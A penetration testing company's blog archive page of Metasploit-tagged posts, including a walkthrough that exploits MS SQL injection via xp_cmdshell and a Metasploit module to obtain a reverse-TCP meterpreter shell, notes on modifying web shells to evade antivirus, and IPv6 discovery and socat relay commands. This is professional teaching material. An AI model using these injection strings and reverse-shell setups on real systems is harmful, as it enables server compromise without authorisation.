SECFORCE          
SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing
   
HOME SECFORCE - penetration testing COMPANY SECFORCE - penetration testing SERVICES SECFORCE - penetration testing RESEARCH SECFORCE - penetration testing BLOG SECFORCE - penetration testing INITIATIVES SECFORCE - penetration testing CONTACT
 
SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing
    SECFORCE - penetration testing

Blog ■

 
SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing SECFORCE - penetration testing
    Home : Blog  
SECFORCE - penetration testing SECFORCE - penetration testing
   
Posts Tagged ‘metasploit’
 

SECFORCE invited to present at Athcon

Saturday, June 18th, 2011

SECFORCE was invited to present at Athcon conference, held in Athens during 2nd and 3rd June 2011.

AthCon is an annual IT security conference that takes place in Athens Greece designed to give a technical insight to the world of IT security. A realistic, practical view of current and evolving threats and security trends presented by top international security experts.

Athcon

SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features.

The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements.

You can download the slides from the talk from our security research area.

Exploiting SQL injection vulnerabilities with Metasploit

Thursday, January 27th, 2011

In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker.

Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures:

http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64′;–

If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module.

The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester.

It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above:

msf > use windows/mssql/mssql_payload_sqli

msf exploit(mssql_payload_sqli) >
 set GET_PATH http://192.168.1.66/
 showproduct.asp?id=1;[SQLi];--
GET_PATH => http://192.168.1.66/
 showproduct.asp?id=1;[SQLi];--
msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66

RHOST => 192.168.1.66

msf exploit(mssql_payload_sqli) >
 set PAYLOAD windows/patchupmeterpreter/reverse_tcp

PAYLOAD => windows/patchupmeterpreter/reverse_tcp

msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64

LHOST => 192.168.1.64

msf exploit(mssql_payload_sqli) > set LPORT 80

LPORT => 80

msf exploit(mssql_payload_sqli) > exploit

After the exploitation the attacker will get a meterpreter shell.

SQL injection exploitation with Metasploit

SQL injection exploitation with Metasploit

If you want to use this code you can download it from Secforce security tools repository.

Exploiting MS09-004 via SQL injection

Monday, January 24th, 2011

Recently we were performing an web application penetration test to one of our clients and identified a SQL injection vulnerability. The vulnerability allowed us to conduct a degree of fingerprinting on the remote server; however, the Microsoft SQL Server back-end database didn’t allow to execute commands via the well known xp_cmdshell stored procedure.

Based on the fingerprinting information we identified that the database server was running an old and vulnerable version of MS SQL server. Microsoft SQL Sever 2000 SP3, to be precise.

All indicated that the server was vulnerable to MS09-004 vulnerability. However, it was not possible to get direct access to the database. Moreover no authentication credentials were discovered during the course of the assessment.

This is how our newly released Metasploit module was born. We coded an extension which can be added to Metasploit to exploit this vulnerability using a SQL injection vulnerability with no need of using credentials, as the web application will authenticate in our behalf.

Penetration testing - SQL injection exploitation

Penetration testing - SQL injection exploitation

The screenshot above shows how to get meterpreter (or any other payload of your choice) exploiting the vulnerability from Metasploit.

If interested, get the scripts from our security tools area.

Metasploit and SQL injection

Monday, January 17th, 2011

SECFORCE has released a set of scripts for enhancing Metasploit functionality exploiting SQL injection vulnerabilities. This is particularly useful in two scenarios:

  • When an attacker achieves command execution on a database via SQL injection, but he wants all the functionality offered by Metasploit.
  • The attacker identifies that the backend SQL server is vulnerable to MS_09004 but has no credentials or direct access to the database.
The scripts can be retrieved from our security research page.

Penetration testing, antivirus, firewalls and false sense of security

Sunday, November 9th, 2008

False sense of security is an ongoing issue. Fueled by inaccurate marketing strategies promising the ultimate security product and convincing clients that their product will make your system immune to every single attack.

Security professionals are used to hear all kind of comments from clients caught up by false sense of security; the three most common mistakes are:

Client – My application must be secure, it is running over SSL.
Penetration tester – That’s good, your IDS will not pick up my attacks.

Client – My web application must be secure, it is protected by my firewall.
Penetration tester – Sure enough your firewall is not going to filter web traffic on your web server.

Client – My server must be secure, it has an antivirus up to date.
Penetration tester – Your antivirus will only pick up known signatures, it will not pick up my custom made scripts.

We recently performed a back box web application peneration test for a client who expresed (before the penetration test) how secure his application was as he deployed SSL on the application layer, antivirus on the server and everything was protected using a firewall.

During the penetration test we managed to find a page which allowed uploading arbitrary files to the web server. When we tried to upload some of the standard web shells we saw how the antivirus was detecting them and removing them from the server. It is fair to say that an antivirus in this case provides a very thin layer of security. After doing some modifications to the scripts we easily bypassed the antivirus protection.

In this example achieving command execution required another step as the user the web server was running as had not enough privileges. However, it was easy enough finding a high privilege username/password for the MS SQL database also running on the server. The next steps were:

– Creating a custom script which connected to the MS SQL database using a high privileged account.
– Enabling xp_cmdshell stored procedures, as we found it disabled.
– Enjoying command execution.

Once we got to this point it was easy to execute Metasploit Meterpreter to bypass firewall protection, tunneling services over HTTP.

In conclusion, SSL, antivirus and firewalls are essential parts on the security of an infrastructure, however they need to be properly implemented and they don’t protect from all kinds of attacks.

Penetration testing with IPv6

Tuesday, October 14th, 2008

Today has been released the Uninformed (number 10) magazine. As usual it is a very interesting read, with very nice and technical articles there. One of them caught my eye, written by H D Moore – Exploiting Tomorrow’s Internet Today, Penetration testing with IPv6.

IPv6 is an Internet layer protocol designed to substitute the current IPv4. The article covers the basics of IPv6 such as configuration and addressing standards.

Later in the article the author some of the common tasks of penetration testing focusing on IPv6 protocol:

Network Discovery

Van Hauser’s IPv6 Attack Toolkit contains a tool for this. The alive6 tool sends an ICMP6 packet using Neighbor Discovery protocol:

# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy

Found 2 systems alive

Tools ip and ping6 can also be used for that:

# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
# ip neigh | grep ^fe80
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx
fe80::218:8bff:fexx:xxxx dev eth0 lladdr 00:18:8b:xx:xx:xx
[...]

H D More also covers the use of Nmap and Metasploit against IPv6 hosts.

It is interesting the use of socat to ‘translate’ from IPv4 to IPv6 and then being able to use the common penetration testing tools:

$ socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[IPv6%eth0]:80

In the example above socat creates and binds a local IPv4 port (8080) to a remote IPv6 service which was listening on port 80. After running the command above, the penetration tester can confortably use the common web assessment tools such as nikto o web proxies even if they don’t natively support IPv6.

 
   
 
BLOG

Archives

November 2014
July 2014
April 2014
March 2014
February 2014
August 2013
June 2013
February 2013
January 2013
December 2012
November 2012
October 2012
January 2012
October 2011
September 2011
July 2011
June 2011
April 2011
February 2011
January 2011
March 2009
February 2009
January 2009
December 2008
November 2008
October 2008

Categories

Aircraft security (1)
Business Continuity (2)
CREST (1)
cyber security (2)
Embedded devices security (2)
exploit (9)
Fuzzing (1)
Penetration Testing (42)
Phishing (3)
Risk Management (5)
SECFORCE (18)
Security architecture (2)
Security Books (1)
Security Compliance (1)
Security research (10)
social engineering (1)
social media (1)
sql injection (3)
SQL Server (3)
Tools (14)
Uncategorized (3)
Vulnerabilities (10)
 
SECFORCE - penetration testing
  SECFORCE - penetration testing Aegon House, 13 Lanark Square
Canary Wharf - E14 9QD, London
SECFORCE - penetration testing Direct Line +44 (0) 845 056 8694
E-mail SECFORCE - penetration testing
  Follow us in Twitter Check us out in LinkedIn SECFORCE is CREST certified. Click on the logo for more information ISO9001 ISO27001
SECFORCE - penetration testing
    Copyright (c) 2014 SECFORCE Ltd · All Rights Reserved